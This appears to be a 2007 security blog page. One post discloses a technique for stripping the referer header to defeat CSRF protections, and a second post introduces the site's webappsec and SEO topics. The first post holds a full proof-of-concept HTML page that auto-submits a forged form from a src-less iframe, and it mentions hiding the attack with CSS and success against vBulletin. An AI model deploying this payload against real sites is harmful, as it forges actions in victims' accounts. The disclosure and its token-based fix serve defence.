30 September 2007
I've stumbled across this a few months (weeks?) ago, and since I've opened this new blog, I'd like to disclose it (or could this have already been found?).
There are many sites that rely upon the referer header in order to filter XSRF. This has long been proven as a faulty technique, but latest browser updates made it seem secure again.
As XMLHttpRequest and Flash have been limited to communicate only with the domain they came from, there is no way (that I know of) by which you can forge request headers, and still have the correct cookies sent with them.
So I dug a bit here and there, and found a way to prevent the referer header from being sent. No, you can't spoof it to an arbitrary address, but "no-address" usually does the trick just as well.
Here's a full POC.
<html>
<body>
<script>
function doit()
{
var html;
html = '<form action="http://somesite.com/vuln.php" method="post" name="fname">'
+'<input type = "text" name = "SOME_FIELD" value = "ARBITRARY VALUE">'
+'</form>';
window.frames["frm"].document.body.innerHTML = html;
window.frames["frm"].document.fname.submit();
}
</script>
<iframe name="frm" onload="doit()"></iframe>
</body>
</html>
The magic here is performed by creating an IFRAME withought a given SRC. Then you can write content (the XSRF form to be submitted) to the IFRAME via JavaScript, and submit it the same way. Apparently both IE and Firefox see the frame as a blank page, and act as if the form was sent from a local HTML file.
I've tested this on the latest Firefox, and IE6.0 (yeah, kill me for not having the crappy 7.0).
Obviously some CSS code can obfuscate the whole thing completely, and the victim won't know he/she had been attacked. Pretty serious, I guess.
I bet there are many systems vulnerable to this. I successfully tested this on vBulletin 3.6.8. Yep, they rely on referer in their forms.
The way to avoid being vulnerable to this, has already been suggested many times before. DO NOT rely on referer information. To prevent XSRF, use a one time session related token (key) in your forms.
That's it for now.
Posted by: kGen | In category: CSRF (XSRF) | Comments (1)
30 September 2007
And there will be light!
Seems that everything is working now. Well, almost everything. For the next few days the "search" and "user options" features won't be available. Why, you ask? Simple. I didn't implement them yet... This is the price you pay for making a custom system.
So, since this post is here to stay, I'll give you a brief intro into what this whole site deals with. As you can see, my <title> tag gives you out a few keywords about what's gonna be in here. Webappsec, SEO, and more related stuff.
Let me elaborate on each of those separately.
In case you didn't know, "Webappsec" stands for "Web Application Security".
In todays world, information is everything. And thanks to the Internet, it's also everywhere. Traditional info. security was focused on finding and eliminating known software bugs like buffer overflows, by one errors, and the like. Back then, you could fire a debugger on the buggy program, and detect whatever problem was disturbing you.
Today, info. security is different. Since everything is connected into a live giant web, you can't just sit back and debug everything you want as long as you want to. If you've got some interesting data hosted on the net, it won't wait for you to be protected.
The web is based on identical protocols, that have similar implementations. Webappsec is all about finding security problems in those implementations, or even the protocols themselves. Hence making you able to audit live websites (or networks), quickly and seamlessly.
This site will also deal with SEO, Search Engine Optimization.
Not all information needs to stay under the cloak. On the contrary, most info. online is made in order to be read by the public. And for that purpose, we've got search engines. If people can find you on those, you can rest assured that the visitors on your website are enjoying whatever it is you serve them.
If you want to be "visible" online, you need to rank high on Google, Yahoo, MSN, and the rest of the SEs. Learning SEO tactics is going to let you do just that. No matter what you write about, or what you sell, smart SEO will always increase the traffic to your website. On the net, that's pretty much all you can wish for.
This site will also deal with other topics. I promise to give away some sources of my own (php, anyone?), and guide you through the development stages of various features.
Anyway, this site is mainly a blog. It will contain mostly NEWS about the topics I mentioned. But don't worry, I'm planning to give the "articles" section a great deal of my time, so this site can deal with more general stuff too.
So that's it for this post. Hope anyone reads this. Guess I'm going to apply some SEO here myself...
Posted by: kGen | In category: Site news | Comments (3)
Copyright (C) 2007-2008. Some rights reserved. Distribute freely, but don't forget to link to the source.
